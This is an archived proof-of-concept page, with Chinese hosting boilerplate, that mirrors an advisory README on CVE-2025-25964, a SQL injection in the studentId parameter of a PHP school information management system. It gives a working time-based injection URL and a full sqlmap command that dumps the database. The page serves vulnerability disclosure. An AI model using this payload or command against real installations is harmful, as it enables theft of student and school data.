POC详情: 003e266eb8a0701771db4529bbcf699e3f3df163

来源
关联漏洞

疑似Oday

描述
A critical SQL Injection vulnerability (CVE-2025-25964) discovered in the School Information Management System v1.0
介绍
# CVE-2025-25964: SQL Injection in School Information Management System v1.0

##  Introduction

In today's digital landscape, SQL Injection (SQLi) remains one of the most common and dangerous vulnerabilities found in web applications. This blog post discusses a critical SQL Injection vulnerability (CVE-2025-25964) discovered in the School Information Management System v1.0, developed by Itsourcecode. This vulnerability allows remote attackers to exploit the system, leading to potential sensitive information disclosure.

# Vulnerability Overview

**CVE ID**: CVE-2025-25964

**Vulnerability Type**: SQL Injection (SQLi)

**Affected Product**: Student Information Management System - v1.0

**Affected Component**: studentId parameter in /columbans/admin/modules/student/index.php

**Attack Type**: Remote

**Severity**: High

**Discoverer**: Sakib Shaikh

## Steps to Reproduce

To demonstrate the impact, follow these step-by-step instructions:

1. **Set up the vulnerable application:** Install and configure the School Information Management System v1.0 on a local server.

2. **Log in:** Log in with provided credentials by Itsourecode.

3. **Access the vulnerable endpoint:**

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207

4. **Inject an SQL payload to test for SQL Injection:**

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))zKnT)

5. **Observe the application response:** If the page takes 10+ seconds to load, the SQL Injection vulnerability is confirmed. This proves that the backend database is executing the injected SQL query.

6. **Use SQLMap for automated exploitation:**

```bash
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast
```

This command attempts to extract database names, tables, and sensitive information from the system.

## Root Cause Analysis

The issue arises due to improper input sanitization in the studentId parameter of the index.php file. When an attacker modifies the studentId parameter with malicious SQL payloads, the application processes the input without proper validation, leading to SQL injection.


## References

https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system/

https://owasp.org/www-community/attacks/SQL_Injection

文件快照

[4.0K] /data/pocs/003e266eb8a0701771db4529bbcf699e3f3df163 └── [2.4K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。